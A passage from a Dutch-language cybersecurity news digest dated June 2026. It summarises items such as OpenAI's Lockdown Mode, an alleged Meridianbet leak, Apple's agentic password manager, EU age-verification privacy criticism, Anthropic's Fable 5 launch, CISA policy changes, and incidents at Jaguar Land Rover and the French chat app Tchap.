Hiertoe schakelt de Lockdown Mode de volgende functies uit:

*   Live web browsing, dat wordt beperkt tot toegang tot alleen gecacheerde inhoud.

*   Afbeeldingsondersteuning, voor het weergeven van afbeeldingen in reguliere antwoorden of het ophalen van afbeeldingen van het web.

*   Canvas networking, dat gebruikers verhindert om door Canvas gegenereerde code toegang tot het netwerk te verlenen.

*   Bestandsdownloads, die het downloaden van bestanden voor gegevensanalyse blokkeren.

OpenAI benadrukt dat de functionaliteit niet voor iedereen bedoeld is en merkt op dat Lockdown Mode en Developer Mode niet tegelijkertijd kunnen worden gebruikt; het inschakelen van de ene schakelt de andere uit. Het bedrijf waarschuwt dat de Lockdown Mode het risico op datadiefstal via prompt injection weliswaar aanzienlijk vermindert, maar geen absolute garantie biedt. Risico's kunnen blijven bestaan via ingeschakelde apps, onvoorziene combinaties van mogelijkheden of nieuw ontdekte technieken. Ook voorkomt de modus niet alle andere effecten van aanvallen via prompt injection, zoals onjuiste antwoorden veroorzaakt door kwaadaardige instructies in geüploade bestanden.

De ontwikkeling valt samen met de lancering van een nieuwe functionaliteit voor accountbeheer door OpenAI. Deze stelt gebruikers in staat om actieve sessies in ChatGPT te bekijken en uit te loggen uit individuele of alle sessies, mochten er tekenen van ongeautoriseerde accountactiviteit worden gedetecteerd. De weergegeven sessies omvatten informatie over het apparaat, de gebruikte app, een geschatte locatie, de aanmeldingsdatum en -tijd, of het apparaat als vertrouwd wordt beschouwd en of het de huidige sessie betreft.

 

Bron: OpenAI

07 juni 2026 | Vermeend datalek bij gokbedrijf Meridianbet treft mogelijk ook Belgische klanten

Uit dagelijkse monitoring van het darkweb is een forumbericht naar voren gekomen waarin een dreigingsactor, bekend onder de naam INF GRUPA, claimt een uitgebreide klantendatabase van het internationale gokbedrijf Meridianbet te hebben bemachtigd. De vermeende dataset zou maar liefst 3,7 miljoen klantrecords omvatten.

Volgens de informatie die op het darkweb is gepubliceerd, zouden de getroffen klanten afkomstig zijn uit een elftal landen. Specifiek wordt België genoemd, naast Servië, Cyprus, Bosnië, Malta, Peru, Brazilië, Colombia, Tanzania, Nigeria en Zuid-Afrika. Dit is van belang, aangezien Meridianbet al geruime tijd actief is op de Belgische gokmarkt en daarvoor over de benodigde vergunningen beschikt. Eind 2025 verkreeg het bedrijf bovendien een Belgische licentie voor online casinoactiviteiten.

Tot op heden is de claim van INF GRUPA niet onafhankelijk bevestigd door Meridianbet, en het bedrijf heeft nog niet gereageerd op de beweringen. Het is dan ook onduidelijk hoeveel Belgische klanten daadwerkelijk door dit vermeende incident zouden zijn getroffen. INF GRUPA is een actor die in het verleden vaker claims heeft geuit, waarvan de volledige bevestiging niet altijd kon worden vastgesteld.

Gebruikers die een account hebben bij Meridianbet, worden geadviseerd extra alert te zijn op mogelijke phishingpogingen die voortvloeien uit dit datalek. Tevens wordt aangeraden om uit voorzorg het wachtwoord van hun account bij Meridianbet te wijzigen.

 

Bron: Cybercrimeinfo

08 juni 2026 | Waarschuwing voor phishingmail uit naam van Revolut over accountverificatie

Er is een phishingmail in omloop die zogenaamd afkomstig is van de betaaldienst Revolut. In de mail wordt ontvangers gevraagd hun account te verifiëren, met de dreiging dat de rekening wordt gesloten als dat niet op tijd gebeurt. Consumentenprogramma Opgelicht?! waarschuwt voor de berichten.

De mail vertoont verschillende kenmerken van oplichting. De afzender gebruikt geen officieel adres van Revolut, de aanhef is onpersoonlijk en er wordt een kunstmatige tijdsdruk opgebouwd. De link in de mail leidt niet naar de echte website van Revolut.

Ontvangers wordt aangeraden niet op de link te klikken en geen gegevens in te vullen. Bij twijfel is het verstandig om rechtstreeks via de officiële app of website van de betaaldienst in te loggen. Wie toch gegevens heeft achtergelaten, kan het beste het wachtwoord wijzigen en tweestapsverificatie inschakelen.

 

Bron: Opgelicht?!

09 juni 2026 | Apple introduceert AI-gestuurde automatische wachtwoordwijziging

Tijdens de Worldwide Developers Conference (WWDC) 2026 heeft Apple een nieuwe functie aangekondigd die wordt aangedreven door Apple Intelligence. Deze innovatie is gericht op het automatisch herstellen van zwakke en gecompromitteerde wachtwoorden. Momenteel bieden Safari en de ingebouwde Apple Wachtwoorden-app al de mogelijkheid om zwakke, dubbele of gecompromitteerde wachtwoorden te signaleren. Gebruikers ontvangen bijvoorbeeld een waarschuwing bij het aanmaken van een account als het wachtwoord als zwak wordt gedetecteerd, waarna Safari assisteert bij het creëren van een veiliger alternatief.

De huidige functionaliteit van de ingebouwde wachtwoordmanager van Apple of Safari omvat echter geen automatische correctie van zwakke of gecompromitteerde wachtwoorden. Dit verandert met de introductie van de nieuwe AI-gestuurde beveiligingsfunctie. Apple heeft aangegeven dat de wachtwoorden-app en Safari nu kunstmatige intelligentie inzetten om "agentisch" actie te ondernemen op basis van gebruikersgedrag en zo wachtwoorden automatisch te beveiligen.

Deze functie, genaamd de "Agentic password manager", wordt gelanceerd met iOS 27 en zal beschikbaar zijn voor zowel de Wachtwoorden-app als Safari. Het systeem kan automatisch in aanmerking komende accounts bijwerken naar sterkere wachtwoorden. Apple benadrukt de veiligheid en privacy van deze functies, die worden aangedreven door de volgende generatie van Apple Foundation Models.

De Foundation Models zijn op maat gemaakt in samenwerking met Google, waarbij Gemini-modellen zijn gebruikt voor de finetuning van Apple's eigen model en diepgaand zijn geïntegreerd in de Apple Intelligence-ervaringen. Apple heeft in een blogpost toegelicht dat deze nieuwste modellen zowel lokaal op het apparaat als op servers via Private Cloud Compute draaien. Elk aspect van de nieuwe Apple Intelligence-architectuur is ontworpen met privacy als uitgangspunt, van de Foundation Models tot de besturingssysteemtechnologieën die deze modellen diep in Apple's platforms integreren.

Hoewel de meeste functies lokaal op nieuwe iPhones worden uitgevoerd, maakt Apple ook gebruik van Private Cloud Compute voor bepaalde cloud-gebaseerde functionaliteiten, zonder daarbij persoonlijke gegevens van gebruikers te delen. Apple verzekert dat wanneer Private Cloud Compute gebruikersverzoeken verwerkt, persoonlijke gegevens niet worden opgeslagen of toegankelijk zijn voor Apple of derden. De verbeteringen van Apple Intelligence en de Agentic password manager worden naar verwachting later dit jaar met iOS 27 uitgerold. Gebruikers die niet kunnen wachten, kunnen zich aanmelden voor het Developer Program om de bètaversie vandaag nog uit te proberen.

 

Bron: Apple | Bron 2: hubs.li

09 juni 2026 | VK eist apparaatcontroles van techreuzen tegen kinderbeelden

De Britse overheid geeft grote technologiebedrijven zoals Apple en Google drie maanden de tijd om beveiligingsmaatregelen te implementeren op smartphones en tablets. Deze maatregelen moeten het mogelijk maken om naaktbeelden van kinderen te detecteren en te blokkeren, met als doel de verspreiding van dergelijk materiaal tegen te gaan. De bedrijven "moeten ingebouwde functies activeren of technische oplossingen implementeren op smartphones en tablets om naaktbeelden voor kinderen te detecteren en te blokkeren," aldus een persbericht van het Home Office.

De aankondiging werd gedaan door premier Keir Starmer tijdens London Tech Week. De nieuwe regels zullen van toepassing zijn op zowel bestaande als nieuwe smartphones en tablets. Indien de technologiebedrijven niet voldoen aan de eis, zal de overheid wetgeving introduceren om hen te dwingen tot actie. Boetes en mogelijke strafrechtelijke aansprakelijkheid voor technologiebestuurders worden overwogen, waarbij "niets is uitgesloten," zo stelt het persbericht.

Naast het beschermen van kinderen tegen online pornografie en het verminderen van de hoeveelheid beelden in omloop, is het initiatief gericht op het voorkomen dat roofdieren kinderen uitbuiten en misbruiken via hun apparaten. Volwassenen zullen leeftijdsverificatie moeten gebruiken om toegang te krijgen tot alle soorten naaktinhoud. Het Home Office benadrukt dat er geen sprake zal zijn van gegevensverzameling, monitoring of rapportage. "Het apparaat zal simpelweg schadelijke inhoud blokkeren in alle apps en diensten," aldus een bericht op sociale media. Dit moet Groot-Brittannië het eerste land ter wereld maken waar het voor kinderen onmogelijk is om naaktfoto's te maken, te delen of te bekijken op hun apparaten.

Meer dan 90% van de meldingen van kindersekueel misbruik in 2024 betrof inhoud die kinderen zelf hadden gegenereerd. Meerdere kinderen die beelden met roofdieren deelden, hebben uiteindelijk zelfmoord gepleegd, zo vermeldt het persbericht. Apple heeft al stappen ondernomen door standaard leeftijdscontroles te introduceren voor iPhone-gebruikers, maar naaktdetectie wordt nog niet toegepast op berichtendiensten van derde partijen, camera's, apps of zoekopdrachten. Home Secretary Shabana Mahmood stelt dat de overheid wil dat technologiegiganten "naaktheid standaard op het hele apparaat blokkeren, zodat dit alleen kan worden gedeactiveerd via leeftijdsverificatie."

De Britse National Crime Agency heeft de maatregel geprezen en stelt dat apparaatcontroles de slachtofferschap van kinderen online drastisch kunnen verminderen. "We hebben duidelijk gemaakt dat online platforms momenteel functies bevatten die overtreders misbruiken om kinderen op grote schaal te ronselen, te dwingen en seksueel uit te buiten," aldus het bureau in een persbericht. "Het beperken van de toegang tot deze risicovolle functies blijft een belangrijk onderdeel van het verminderen van schade." Deze aankondiging volgt op bredere discussies in het VK over sociale mediabeperkingen die eveneens gericht zijn op de bescherming van kinderen online. De regering zal binnenkort nieuwe maatregelen presenteren om sociale mediaplatforms verantwoordelijk te houden voor de veiligheid van kinderen en het beschermen tegen online schade.

 

Bron: Britse overheid | Bron 2: gov.uk | Bron 3: recordedfuture.com

09 juni 2026 | Experts waarschuwen: Applicatie voor leeftijdscontrole Europese Commissie niet anoniem

De online leeftijdsverificatie die de Europese Commissie wil invoeren, is mogelijk niet anoniem. Dit zou kunnen leiden tot het achterhalen van websitebezoeken door gebruikers. De Europese Commissie heeft hiervoor een eigen applicatie ontwikkeld, die volgens EU-voorzitter Ursula von der Leyen technisch gereed is. De Commissie beweert dat de applicatie voor leeftijdsverificatie "volledig anoniem" is.

Vpn-provider Mullvad heeft deze claim begin juni echter tegengesproken. Volgens Mullvad moeten gebruikers van de applicatie hun identiteit bij een derde partij verifiëren, bijvoorbeeld via een identiteitsbewijs. Deze derde partij, die een lidstaat van de EU kan zijn, verstrekt vervolgens een credential waarmee platforms voor sociale media kunnen zien dat de gebruiker oud genoeg is om de website te bezoeken.

Mullvad wijst op een fundamenteel probleem in deze opzet. De uitgevende instantie die de leeftijdscredential verstrekt, weet welke credential bij welke persoon hoort. Dit betekent dat autoriteiten, bij het aantreffen van onwelgevallige content op platforms voor sociale media, het platform om de bijbehorende credential kunnen vragen. Hiermee zou de persoon eenvoudig te identificeren zijn, waardoor anoniem posten niet langer mogelijk is, aldus de vpn-provider in een blogposting.

Een effectieve oplossing hiervoor is het gebruik van Zero-Knowledge Proof (ZKP) cryptografie. Met ZKP kunnen gebruikers hun identiteit laten verifiëren door een derde partij, zonder dat deze partij de verstrekte credentials kan koppelen aan de accounts van gebruikers op websites en platforms. De huidige Europese applicatie voor leeftijdsverificatie beschikt niet over deze ZKP-functionaliteit. Mullvad stelt verder dat, zelfs als ZKP in de toekomst wordt geïntegreerd, het waarschijnlijk een optionele functie zal zijn die landen kunnen uitschakelen en die de EU op elk moment kan verwijderen.

Jaap-Henk Hoepman, expert op het gebied van privacy en universitair hoofddocent digitale beveiliging aan de Radboud Universiteit in Nijmegen, noemde het tegenover de NOS "heel jammer" dat Brussel het gebruik van ZKP niet verplicht. Hij waarschuwt dat het ontbreken van ZKP de deur opent voor het monitoren van menselijk gedrag op het internet. Thijs van Ede, docent cyberbeveiliging aan de Universiteit Twente, voegt daaraan toe dat volledige anonimiteit alleen gegarandeerd kan worden als gebruikers hun eigen handtekening direct aan websites verstrekken, zonder tussenkomst van een onafhankelijke leeftijdscontroleur. Echter, zonder die tussenpartij wordt de betrouwbaarheid van de leeftijdsverificatie een vraagstuk.

De Amerikaanse burgerrechtenbeweging EFF heeft eveneens gewaarschuwd voor de veiligheids- en privacyrisico's die de Europese applicatie voor leeftijdsverificatie met zich meebrengt. Zij noemen onder andere het risico op langetermijn-identifiers die online tracking kunnen faciliteren en het onnodig delen van persoonlijke informatie. De EFF bestempelt leeftijdsverificatie in deze vorm als een "groeiende wereldwijde dreiging" en stelt dat het geen geschikte methode is om jongeren online te beschermen.

 

Bron: Check Point | Bron 2: commission.europa.eu

09 juni 2026 | Autoriteit Persoonsgegevens ziet forse stijging in privacyklachten

De Autoriteit Persoonsgegevens (AP) heeft in 2025 een aanzienlijke toename van privacyklachten en tips geregistreerd, met een totaal van ruim 13.500 meldingen. Dit betekent een stijging van 75 procent ten opzichte van het voorgaande jaar, 2024. De bevindingen zijn gepubliceerd in de Klachtenrapportage 2025 van de AP.

De meeste klachten hadden betrekking op organisaties die niet tijdig of onvoldoende informatie verstrekten over de verwerking van persoonsgegevens, of die weigerden deze gegevens te verwijderen op verzoek van betrokkenen. Ook datalekken leidden tot een groot aantal binnengekomen klachten.

De zorgsector was in 2025 het meest bekritiseerd, waarbij meer dan de helft van de klachten in deze sector specifiek betrekking had op het datalek bij Clinical Diagnostics. Hierna volgden klachten over zakelijke dienstverleners en overheidsorganisaties. De AP uit extra zorgen over meldingen betreffende overheidsorganisaties die zonder geldige reden persoonsgegevens verwerken, aangezien de overheid vaak grote hoeveelheden gevoelige data beheert en burgers geen alternatief hebben voor interactie met deze instanties.

Aleid Wolfsen, voorzitter van de AP, merkt op dat de forse toename van klachten wijst op een groeiend bewustzijn onder de bevolking over het belang van de bescherming van hun persoonsgegevens en de bekendheid met de AP als meldpunt. Tegelijkertijd uit hij zijn bezorgdheid over het feit dat veel organisaties in eerste instantie onjuist reageren wanneer mensen hun privacyrechten willen uitoefenen. De AP ontving met name veel klachten over de afhandeling van het recht op inzage en het recht op gegevensverwijdering, waarbij organisaties vaak te laat of helemaal niet reageren op verzoeken. Wettelijk gezien moet een organisatie binnen een maand reageren op een dergelijk verzoek; bij nalatigheid kan de AP handhaven. Er liggen plannen klaar om organisaties die niet reageren op inzageverzoeken direct te beboeten.

Een specifiek voorbeeld betreft een klacht over een internationale organisatie met een vestiging in Nederland, die een aanzienlijk bedrag vroeg voor het inzien van eigen gegevens. De AP bevestigde deze praktijk, die in strijd is met de wet, aangezien dit het gebruik van privacyrechten bemoeilijkt. De organisatie ontving een officiële waarschuwing en heeft de praktijk stopgezet.

De AP heeft bij ongeveer een derde van de klachten ingegrepen door organisaties de regels uit te leggen in een gesprek of door te bemiddelen bij een oplossing, waardoor verder onderzoek overbodig werd. Daarnaast heeft de AP 29 verdiepende onderzoeken uitgevoerd naar klachten over Nederlandse organisaties. Bij ruim een derde van de nationale klachten kon de AP geen onderzoek doen, bijvoorbeeld omdat de zaak buiten haar wettelijke bevoegdheden viel. Een ander deel van de klachten werd na een eerste onderzoek afgesloten, bijvoorbeeld omdat er geen sprake meer was van een overtreding.

Elke klacht wordt zorgvuldig bekeken en de AP analyseert ook bredere trends om sectoroverschrijdende problemen te identificeren en zo bij te dragen aan de digitale weerbaarheid. Door de sterke stijging van het aantal klachten ondervindt de AP echter moeilijkheden bij het tijdig beantwoorden van alle meldingen, wat leidt tot lange wachttijden en een punt van zorg blijft voor de toezichthouder.

 

Bron: Autoriteit Persoonsgegevens

10 juni 2026 | Anthropic lanceert Claude Fable 5 met ingebouwde beveiligingsmechanismen

Anthropic heeft de uitrol gestart van een nieuw model genaamd Fable 5, dat gebaseerd is op hetzelfde onderliggende model als Mythos, de krachtigste klasse van AI modellen van het bedrijf. Eerder had Anthropic aangegeven dat Mythos, een geavanceerd model, aanzienlijke beveiligingsrisico's met zich meebracht voor bedrijven wereldwijd. Destijds waarschuwde Anthropic dat Mythos krachtig genoeg was om kwaadwillenden potentieel te helpen bij het aanvallen van publieke en private software.

In april, bij de aankondiging van het Mythos model, stelde Anthropic: "Het voordeel zal liggen bij de partij die het meeste uit deze tools kan halen. Op korte termijn kunnen dit aanvallers zijn, als frontier labs niet zorgvuldig omgaan met de release van deze modellen. Op lange termijn verwachten we dat het verdedigers zullen zijn die efficiënter middelen zullen sturen en deze modellen zullen gebruiken om bugs te verhelpen voordat nieuwe code wordt uitgerold." Dit impliceerde dat het model misbruikt kon worden om kwetsbaarheden in applicaties, zoals Firefox, te vinden en te exploiteren. Vanwege deze risico's besloot Anthropic de toegang tot modellen zoals Mythos te beperken en ze alleen aan cybersecurity experts en vertrouwde bedrijven aan te bieden.

Anthropic meldt nu dat het sterke beveiligingsmechanismen heeft ontwikkeld voor dezelfde modelklasse, waardoor deze krachtige AI modellen niet langer gemakkelijk door kwaadwillenden kunnen worden misbruikt. Het resultaat is de lancering van een veiligere versie, genaamd Fable 5. Volgens Anthropic is dit model voorzien van strikte waarborgen die gevoelige vragen, zoals die betrekking hebben op offensieve cybersecurity, biologie of chemie, blokkeren of omleiden naar het eerdere model, Opus 4.8.

De onbeperkte versie van dit model heet Claude Mythos 5, waarbij de beveiligingsmechanismen zijn opgeheven. Vanwege de inherente risico's is deze versie uitsluitend beschikbaar voor een streng gescreende groep vertrouwde partners, waaronder cyberverdedigers van overheden en specifieke onderzoekers in de levenswetenschappen.

Fable 5 wordt voor een beperkte periode gratis aangeboden. Het model verbruikt tokens aanzienlijk sneller dan andere modellen van Anthropic. Het bedrijf verklaart dat Fable 5 een duur model is omdat het veel rekenkracht vereist, waardoor het niet zo gemakkelijk beschikbaar kan worden gesteld als Opus 4.8 of eerdere modellen. Echter, tot 22 juni zal Fable 5 beschikbaar zijn voor alle Pro-, Max- en Enterprise-klanten, waarna het zal overschakelen op een gebruiksgebaseerde prijsstelling.

Tests van BleepingComputer toonden aan dat Fable 5 in enkele minuten een enorme hoeveelheid tokens verbruikt. Met name bij het gebruik van Workflow, een nieuw uitvoeringssysteem dat Claude in staat stelt complexe opdrachten op te splitsen in kleinere taken en parallelle subagenten in te zetten, werd een Max-abonnement van 100 dollar in slechts negen minuten volledig verbruikt. Hoewel het verbruik minder extreem is bij informele interacties, zal Fable 5 nog steeds ongeveer twee keer sneller tokens verbruiken dan het Opus model, zelfs zonder de Workflow-modus op hoge intensiteit te gebruiken. Dit verklaart waarom Anthropic aarzelt om Fable 5 op dezelfde schaal als Opus en andere modellen vrij te geven, hoewel dit in de komende weken zou kunnen veranderen, aangezien het bedrijf bekend staat om het later aanpassen van zijn modellen en het vergroten van de capaciteit.

 

Bron: Anthropic

10 juni 2026 | CISA herziet aanpak cyberkwetsbaarheden en risico's

De Cybersecurity and Infrastructure Security Agency (CISA) is van plan haar methoden voor het beoordelen van cyberkwetsbaarheden en dreigingen ingrijpend te herzien. De Amerikaanse overheidsinstantie zal prioriteit geven aan bepaalde risico's boven andere, om zo effectiever te kunnen opereren in een omgeving waar dreigingen toenemen. Dit kondigde waarnemend directeur Nick Andersen dinsdag aan.

Een bindende operationele richtlijn, die woensdag wordt uitgebracht, zal deze nieuwe denkwijze integreren. Federale agentschappen zullen worden verplicht om hun benadering van kwetsbaarheden te veranderen door sommige risico's te verhogen in prioriteit en andere te de-prioriteren. CISA is eveneens van plan om dieper in te gaan op de manier waarop entiteiten in kritieke infrastructuur hun reacties op cyberdreigingen prioriteren.

Andersen benadrukte tijdens een evenement in Washington, D.C., georganiseerd door cybersecuritybedrijf Axonius, dat het noodzakelijk is te accepteren dat sommige systemen en elementen van kritieke infrastructuur minder belangrijk zijn dan andere. Zonder deze afwegingen zou CISA verantwoording moeten afleggen over langdurige uitval van telecommunicatie-infrastructuur, gebrek aan toegang tot schoon drinkwater of andere essentiële diensten.

De nieuwe bindende operationele richtlijn zal onder meer adresseren of patching-periodes moeten worden verkort en zo ja, met hoeveel. Ook zullen federale agentschappen hun protocollen voor kwetsbaarheidsbeheer in het algemeen moeten aanpassen. De belangrijkste boodschap van de richtlijn is dat CISA afstapt van de verouderde historische benadering van "patch is uitgebracht, pas deze zo snel mogelijk toe". In plaats daarvan wordt een grotere focus gelegd op het risico dat gepaard gaat met elke kwetsbaarheid. Dit omvat overwegingen zoals de internetverbinding van een asset, de afstemming met een bekende, misbruikte kwetsbaarheid, en of de exploitatie automatiseerbaar is.

CISA heeft al diverse functies om kwetsbaarheden te prioriteren, maar Andersen gaf aan dat deze niet succesvol genoeg zijn. Hij noemde het bestaande Section 9 protocol van de instantie, dat entiteiten aanwijst waar een cybersecurityincident een catastrofale impact kan hebben, als voorbeeld van een maatregel die onvoldoende effectief is gebleken. In het verleden feliciteerde CISA operators met een Section 9 aanwijzing zonder gedetailleerde vervolgvragen te stellen. Andersen stelt dat CISA een bedrijf moet kunnen benaderen met de specifieke functie die het ondersteunt en die het kritieker maakt, om vervolgens een gesprek te voeren over de specifieke assets die die functie ondersteunen en hoe een meetbaar niveau van veerkracht voor die assets kan worden bereikt.

Historisch gezien brede inlichtingen gesprekken moeten "tot in detail" worden uitgewerkt, aldus Andersen. Als voorbeeld noemde hij de noodzaak voor CISA om prioriteit te geven aan de soliditeit van het bulkbetalingssysteem van een bank, in plaats van zich zorgen te maken over de operationele status van een enkel filiaal na een cyberaanval.

Ondanks recente beperkingen door een overheidssluiting en massaontslagen, pakt CISA de personeelstekorten aan. De instantie is van plan om meer dan 300 nieuwe medewerkers aan te nemen, waarvan 180 voor het einde van deze maand. De initiële aanwervingsgolf richt zich op het aanvullen van medewerkers die werkzaam zijn op het gebied van infrastructuurbeveiliging, noodcommunicatie en in lokale regio's als regionale cybersecurity coördinatoren. Sommige van de nieuwe medewerkers zijn al begonnen met hun werkzaamheden.

 

Bron: CISA | Bron 2: recordedfuture.com

10 juni 2026 | Belgische ethisch hacker Robbe Van Roey belicht cybercriminaliteit in Nederlands museum

De Belgische ethisch hacker Robbe Van Roey (26) uit Tessenderlo speelt een prominente rol in de tentoonstelling "Over de grens" van het Limburgs Museum in het Nederlandse Venlo. In deze tentoonstelling, die zich richt op grensoverschrijdende criminaliteit, legt Van Roey uit hoe cybercriminaliteit zich ontwikkelt en welke rol ethisch hacken daarin speelt. Hij beschrijft cybercriminaliteit als de criminaliteit van de toekomst, waarbij fysieke inbraken plaatsmaken voor digitale aanvallen.

Als ethisch hacker spoort Van Roey in opdracht kwetsbaarheden op in websites, mobiele applicaties, netwerken en fysieke hardware. Na een grondige testperiode van ongeveer een week rapporteert hij de gevonden beveiligingsfouten aan zijn klanten, zodat deze kunnen worden hersteld voordat kwaadwillende actoren ze kunnen misbruiken. Van Roey heeft al kwetsbaarheden ontdekt bij grote internationale bedrijven zoals Google, Apple, Amazon, Nvidia en Twitter, maar werkt ook voor diverse kleinere Belgische ondernemingen.

Een opvallend aspect dat Van Roey benadrukt, is de unieke wettelijke positie van ethisch hacken in België. België is het enige land ter wereld waar ethisch hacken onder strikte voorwaarden volledig legaal is. Indien een ethisch hacker een beveiligingsfout ontdekt bij een Belgisch bedrijf, mag hij dit veilig melden zonder angst voor vervolging. De voorwaarden omvatten het beperken van de handelingen tot wat noodzakelijk is om de kwetsbaarheid vast te stellen en een melding binnen 24 uur bij zowel de betrokken organisatie als het Centrum voor Cybersecurity België (CCB). Dit staat in schril contrast met een eerdere ervaring van Van Roey, toen hij in Singapore toegang vond tot bankgegevens en hierop een juridische waarschuwing ontving van advocaten.

Van Roey begon al op jonge leeftijd met hacken, gedreven door nieuwsgierigheid en een interesse in het 'kapotmaken' van websites. Hij waarschuwt dat cybercriminaliteit blijft toenemen, mede doordat daders vaak vanuit landen als Rusland opereren, wat opsporing voor lokale politie bemoeilijkt en internationale samenwerking via Interpol noodzakelijk maakt. De ethisch hacker verwacht bovendien dat artificiële intelligentie de cybercriminaliteit ingrijpend zal veranderen, waardoor phishing aanvallen veel specifieker en contextgevoeliger kunnen worden.

Om zich te wapenen tegen deze ontwikkelingen, benadrukt Van Roey het belang van kennisdeling onder ethische hackers. Via een open source werkwijze, waarbij codes en onderzoeksresultaten openbaar worden gedeeld, kunnen zij voortbouwen op elkaars werk en zo een stap voor blijven op cybercriminelen. De tentoonstelling "Over de grens" in het Limburgs Museum loopt nog tot en met 3 februari 2027.

 

Bron: Limburgs Museum

10 juni 2026 | Gratis app toont welke gegevens iPhone aanbiedt voor fingerprinting

Beveiligingsonderzoekers van de groep Mysk hebben een gratis opensource app gelanceerd, genaamd Loupe, die gebruikers inzicht geeft in de gegevens die iPhones en iPads beschikbaar stellen voor fingerprinting. Deze app leest de waardes uit publieke iOS API's, dezelfde interface die door third party apps gebruikt kan worden. Door deze API's kunnen diverse soorten informatie worden opgevraagd waarover de iPhone reeds beschikt.

Tot de verzamelbare informatie behoren onder andere de gekozen taal van het apparaat, een overzicht van de geïnstalleerde apps, gedetailleerde batterijgegevens en informatie van apparaatsensoren. De onderzoekers van Mysk benadrukken dat individuele uitgelezen waardes op zichzelf niet uniek zijn. Echter, wanneer deze waardes worden gecombineerd, vormen ze een unieke "fingerprint" waarmee gebruikers kunnen worden gevolgd op apps en websites, zonder dat trackers direct toegang nodig hebben tot persoonlijke gegevens zoals naam, e-mailadres of locatie.

Mysk heeft de broncode van de Loupe app beschikbaar gesteld via GitHub, wat de opensource aard en transparantie van het project onderstreept. De onderzoekers verzekeren gebruikers dat de app zelf geen gegevens verstuurt. Momenteel wordt er gewerkt aan de ontwikkeling van een versie van Loupe die compatibel is met macOS, wat de functionaliteit van de tool verder zal uitbreiden naar andere Apple-platformen. De app is gericht op het vergroten van het bewustzijn over de mechanismen achter device fingerprinting en hoe persoonlijke informatie, zelfs indirect, kan worden gebruikt voor trackingdoeleinden.

 

Bron: mysk-research | Bron 2: github.com | Bron 3: apps.apple.com

10 juni 2026 | Jaguar Land Rover verplicht 30.000 medewerkers tot fysieke wachtwoordreset na hack

Na een cyberaanval vorig jaar heeft autofabrikant Jaguar Land Rover (JLR) een grootschalige en ongebruikelijke maatregel genomen, dertigduizend medewerkers moesten in persoon hun wachtwoord komen wijzigen. Dit werd vorige week bekendgemaakt door de voormalige chief information security officer (CISO) Ashish Shrestha tijdens het evenement Infosecurity Europe.

De cyberaanval, die JLR begin september vorig jaar trof, leidde tot wekenlange productiestilstand en had ook gevolgen voor toeleveranciers. Een van de eerste prioriteiten van Shrestha was het controleren van de integriteit van de Microsoft 365-omgeving, essentieel voor interne communicatie. Om absolute zekerheid te krijgen dat de communicatiekanalen niet waren gecompromitteerd en dat elke gebruiker legitiem was, besloot JLR tot de drastische wachtwoordreset.

Shrestha legde uit dat de reset op kantoor moest plaatsvinden om het risico te vermijden dat een aanvaller, die mogelijk al toegang had tot een account, het wachtwoord op afstand zou kunnen wijzigen. Naast de wachtwoorden werd ook de multifactorauthenticatie van alle medewerkers gereset.

De financiële impact van de aanval was aanzienlijk. In het kwartaal van 1 juli tot en met 30 september vorig jaar rapporteerde JLR een verlies van omgerekend 550 miljoen euro, in schril contrast met de winst van 450 miljoen euro in dezelfde periode een jaar eerder. Bovendien maakte de autofabrikant 222 miljoen euro aan aanvullende "kosten gerelateerd aan cyber" - uitgaven voor bijvoorbeeld externe consultants. De omzet daalde in dat kwartaal met 24 procent, van 7,4 miljard euro naar 5,5 miljard euro.

Volgens het CMC, een non-profitorganisatie die de impact van cyberincidenten op Britse bedrijven onderzoekt, heeft de aanval het Verenigd Koninkrijk omgerekend 2,2 miljard euro gekost. Eerder had de Britse overheid al aangekondigd dat zij garant staat voor een lening aan JLR ter waarde van 1,7 miljard euro om de gevolgen van de aanval op te vangen.

 

Bron: infosecurity-magazine.com

10 juni 2026 | Frans cyberagentschap ANSSI meldt veiligheidsincident met chatapp Tchap

De Franse overheid heeft een veiligheidsincident gemeld betreffende Tchap, de zelfontwikkelde chatapp die door Franse ambtenaren wordt gebruikt voor communicatie. Het incident omvat de compromittering van een gebruikersaccount via social engineering, wat mogelijk heeft geleid tot ongeautoriseerde toegang tot data. Het Franse cyberagentschap ANSSI heeft de compromittering van de chatdienst bevestigd, maar benadrukt dat privéberichten van gebruikers veilig zijn.

Een onbekende aanvaller beweert op internet in het bezit te zijn van een aanzienlijke hoeveelheid data, waaronder ruim 643.000 berichten en de gegevens van 73.000 accounts. Daarnaast claimt de aanvaller chatgeschiedenis van 876 chatrooms en ongeveer 60.000 uitgewisselde mediabestanden te hebben gestolen. Deze claims zijn echter nog niet bevestigd door de Franse autoriteiten.

Tchap is een aangepaste versie van de beveiligde chatapp Riot en is exclusief toegankelijk voor personen met een .gouv of een vergelijkbaar e-mailadres. De aanvaller stelt dat toegang werd verkregen tot een Tchap account dat gekoppeld was aan de onderwijsomgeving van de chatapp, door middel van social engineering. ANSSI voert momenteel een onderzoek uit naar de exacte aanvalsmethode en de omvang van de data waartoe de aanvaller toegang heeft gehad.

Het cyberagentschap heeft laten weten dat openbare gesprekken die via Tchap worden gevoerd, toegankelijk zijn voor alle gebruikers en niet zijn versleuteld. Om Tchap-gebruikers hiervan op de hoogte te stellen, is een bericht verstuurd waarin wordt uitgelegd dat publieke chatrooms door alle Tchap-gebruikers kunnen worden gevonden en dat de inhoud van deze chats niet versleuteld is.

De aanvaller heeft mogelijk ook toegang gekregen tot persoonlijke data die gebruikers deelden in gesprekken met het gehackte account. De Franse privacytoezichthouder CNIL is ingelicht over het incident en de mogelijke implicaties voor de privacy van de gebruikers.

 

Bron: ANSSI | Bron 2: ssi.gouv.fr

10 juni 2026 | Meta verwijdert code voor gezichtsherkenning uit app voor camerabrillen

Meta heeft functionaliteit voor gezichtsherkenning verwijderd uit de app die hoort bij haar camerabrillen. Dit melden de Amerikaanse burgerrechtenbeweging EFF en Wired. De Meta AI-app, die gebruikers op hun smartphone installeren, is een essentiële component voor de functionaliteit van de camerabrillen. Onderzoekers hadden in de code van de app de mogelijkheid ontdekt om afbeeldingen van gezichten om te zetten in unieke biometrische signatures. Dit zou het mogelijk maken om onbekende personen in openbare ruimtes te identificeren, zo stelt de EFF.

De burgerrechtenbeweging baseerde haar bevindingen op een gedetailleerde analyse van de app-code. Hieruit bleek dat "wanneer deze feature staat ingeschakeld, het elk nieuw gezicht in beeld van de surveillancebril zal omzetten naar een reeks getallen, en die vergelijken met alle bestaande gezichtsprints in de database van de gebruiker." Hoewel de functionaliteit nog niet actief was voor eindgebruikers van de camerabril, slaagde een onderzoeker erin de code te activeren en zo daadwerkelijk gezichten te herkennen.

